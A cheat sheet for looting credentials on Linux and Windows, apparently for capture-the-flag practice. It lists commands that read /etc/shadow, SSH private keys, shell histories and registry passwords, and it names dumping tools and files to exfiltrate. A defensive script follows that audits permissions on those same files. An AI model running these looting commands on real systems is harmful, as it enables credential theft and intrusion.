LINUX CRED LOOTING
Quick Greps (Common dirs)
grep -Ri 'pass\|user\|key\|token' /home/*
grep -Ri 'password' /var/www/
strings * | grep -i pass
Common Files & Targets
cat ~/.bash_history
cat ~/.ssh/id_rsa
ls -la ~/.ssh/
cat /etc/passwd
cat /etc/shadow # (if root)
Config Files (often hold creds)
find / -name "*.php" 2>/dev/null
find / -name "*.conf" 2>/dev/null
find / -name ".env" 2>/dev/null
WINDOWS CRED LOOTING
File Targets
type %USERPROFILE%\Desktop\*.txt
type %USERPROFILE%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
Registry Secrets
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"
reg query HKCU /f password /t REG_SZ /s
Files to Check
C:\Users\<user>\AppData\Roaming\Microsoft\Credentials
C:\Windows\System32\config\SAM (needs SYSTEM)
TOOLS (Dumpers & Search)
# LaZagne (Windows/Linux)
laZagne.exe all
# PEASS (post-ex, built-in looting)
linpeas.sh
winPEAS.bat
# Secretsdump (if you get SYSTEM)
secretsdump.py -sam SAM -system SYSTEM LOCAL
FILES TO EXFIL
~/.ssh/id_rsa
/root/.bash_history
/root/.mysql_history
webapp config files (db creds!)
/var/backups/
/etc/shadow
SAM/SYSTEM/SECURITY (Windows)
CTF Pro-Tips
.bash_history = gold
.env, .git/config, .mysql_history, wp-config.php, config.php
Check /var/backups/ for old passwd/shadow files
Look for user-level SSH keys you can reuse
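
From the defending side, the Linux files named on this sheet only leak credentials when their mode bits let another account read them. The audit below is an added example, not part of the original sheet; the function names audit_cred_perms and make_sample_tree and the sample tree are constructed for illustration.

```shell
#!/bin/sh
# Added example (defensive audit, not from the original sheet).
# File names below are the ones the sheet lists as credential sources.

# audit_cred_perms ROOT
# Prints "MODE PATH" for every listed file under ROOT that group or other
# can read. Returns 1 if anything was reported, 0 if the tree is clean.
# Assumption: paths contain no newlines.
audit_cred_perms() {
    root=${1:-/home}
    findings=$(find "$root" -xdev -type f \
        \( -name id_rsa -o -name .bash_history -o -name .mysql_history \
           -o -name .env -o -name wp-config.php -o -name config.php \
           -o -path '*/.git/config' \) \
        \( -perm -040 -o -perm -004 \) 2>/dev/null) || true
    if [ -z "$findings" ]; then
        return 0
    fi
    printf '%s\n' "$findings" | while IFS= read -r f; do
        printf '%s %s\n' "$(ls -ld "$f" | cut -d' ' -f1)" "$f"
    done
    return 1
}

# make_sample_tree: builds a constructed directory tree for a dry run and
# prints its path. Two files are deliberately too permissive.
make_sample_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/alice/.ssh" "$d/bob/.ssh" "$d/www/.git"
    for f in alice/.ssh/id_rsa alice/.bash_history bob/.ssh/id_rsa \
             www/.env www/.git/config www/notes.txt; do
        echo constructed > "$d/$f"
        chmod 600 "$d/$f"
    done
    chmod 644 "$d/bob/.ssh/id_rsa"   # world-readable private key
    chmod 640 "$d/www/.env"          # group-readable app secrets
    chmod 644 "$d/www/notes.txt"     # not a listed name, ignored
    printf '%s\n' "$d"
}

# Dry run against the constructed tree: sh audit.sh --demo
if [ "${1:-}" = "--demo" ]; then
    t=$(make_sample_tree)
    audit_cred_perms "$t" || echo "fix with: chmod 600 <file>"
    rm -rf "$t"
fi
```

A non-zero return makes the function usable as a gate in a hardening or CI check.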